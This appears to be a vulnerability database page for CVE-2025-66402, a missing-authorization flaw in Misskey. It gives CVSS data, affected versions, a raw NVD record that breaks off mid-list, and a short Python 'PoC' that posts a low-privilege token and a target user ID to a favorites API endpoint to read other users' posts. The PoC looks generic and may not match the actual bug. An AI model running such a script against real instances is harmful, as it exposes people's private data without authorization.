CVE-2025-66402

Description

Misskey is an open source, federated social media platform. Starting in version 13.0.0-beta.16 and prior to version 2025.12.0, an actor who does not have permission to view favorites or clips can can export the posts and view the contents. Version 2025.12.0 fixes the issue.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:misskey:misskey:13.0.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:misskey:misskey:13.0.0:beta16:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:misskey:misskey:13.0.0:beta21:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:misskey:misskey:13.0.0:beta22:*:*:*:*:*:* - VULNERABLE

Misskey 13.0.0-beta.16

Misskey 13.0.0-beta.17

Misskey 13.0.0-beta.18

Misskey 13.0.0-rc.1

Misskey 13.0.0

Misskey 13.x.x < 2025.12.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-66402 PoC - Misskey Unauthorized Access
# Target: Misskey instances < version 2025.12.0

TARGET_URL = "https://target-misskey-instance.com"
ATTACKER_TOKEN = "your_low_privilege_token"

def exploit_unauthorized_export():
    """
    Exploit for CVE-2025-66402
    This PoC demonstrates unauthorized access to favorites/clips export
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Target user ID whose content we want to access
    target_user_id = "target_user_id_here"
    
    # Try to export favorites without proper authorization
    favorites_endpoint = f"{TARGET_URL}/api/notes/favorites"
    
    payload = {
        "limit": 100,
        "userId": target_user_id
    }
    
    try:
        response = requests.post(favorites_endpoint, json=payload, headers=headers)
        
        if response.status_code == 200:
            data = response.json()
            print(f"[!] Successfully accessed favorites - {len(data)} notes exposed")
            print(json.dumps(data, indent=2))
        else:
            print(f"[*] Request failed with status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[*] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-66402 PoC - Misskey Unauthorized Export")
    exploit_unauthorized_export()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66402
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66402
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66402/
[4] VulDB https://vuldb.com/cve/CVE-2025-66402
[5] https://github.com/misskey-dev/misskey/commit/dc77d59f8712d3fe0b73cd4af2035133839cd57b
[6] https://github.com/misskey-dev/misskey/security/advisories/GHSA-496g-mmpw-j9x3
[7] https://github.com/misskey-dev/misskey/security/advisories/GHSA-496g-mmpw-j9x3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66402", "sourceIdentifier": "[email protected]", "published": "2025-12-16T00:16:02.207", "lastModified": "2026-01-06T19:42:01.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Misskey is an open source, federated social media platform. Starting in version 13.0.0-beta.16 and prior to version 2025.12.0, an actor who does not have permission to view favorites or clips can can export the posts and view the contents. Version 2025.12.0 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.1.0", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "1BA8B906-8DD2-4D82-90A7-AD955FEF15FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "786B1922-6E2E-48B5-8AA6-16566BDC39EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta16:*:*:*:*:*:*", "matchCriteriaId": "856F7093-6778-4449-A6B2-FADF0CC81BB8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta21:*:*:*:*:*:*", "matchCriteriaId": "4AEFFF0D-A3ED-41AF-B5F2-7E3E2CCB3E38"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta22:*:*:*:*:*:*", "matchCriteriaId": "4615D7DB-9603-482D-8615-C09E8F41B204"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta23:*:*:*:*:*:*", "matchCriteriaId": "D58C35C6-5F19-4588-B369-84275C2878F2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta24:*:*:*:*:*:*", "matchCriteriaId": "7A4672A2-20B7-403A-8430-A6D206D6B032"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta25:*:*:*:*:*:*", "matchCriteriaId": "A1BAC1C3-CB0C-4C16-83C7-A18A4A7D3676"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta26:*:*:*:*:*:*", "matchCriteriaId": "E1C4D34E-1B6B-48A7-8FA7-F0872C63C727"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta27:*:*:*:*:*:*", "matchCriteriaId": "94E0E909-C42C-40B5-A4B5-D64049443903"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta28:*:*:*:*:*:*", "matchCriteriaId": "CE544D6C-44DB-4E68-BFCE-DABC08EE3803"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta29:*:*:*:*:*:*", "matchCriteriaId": "9F7A9629-9216-4F67-BF4E-69792256CFCA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta30:*:*:*:*:*:*", "matchCriteriaId": "5DB2EE81-D8F4-4A42-B6EA-B78B58782EDD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta31:*:*:*:*:*:*", "matchCriteriaId": "75364266-87FE-4DED-8DCC-B1B853C1EB31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:misskey:misskey:13.0.0:beta32:*:*:*:*:* ... (truncated)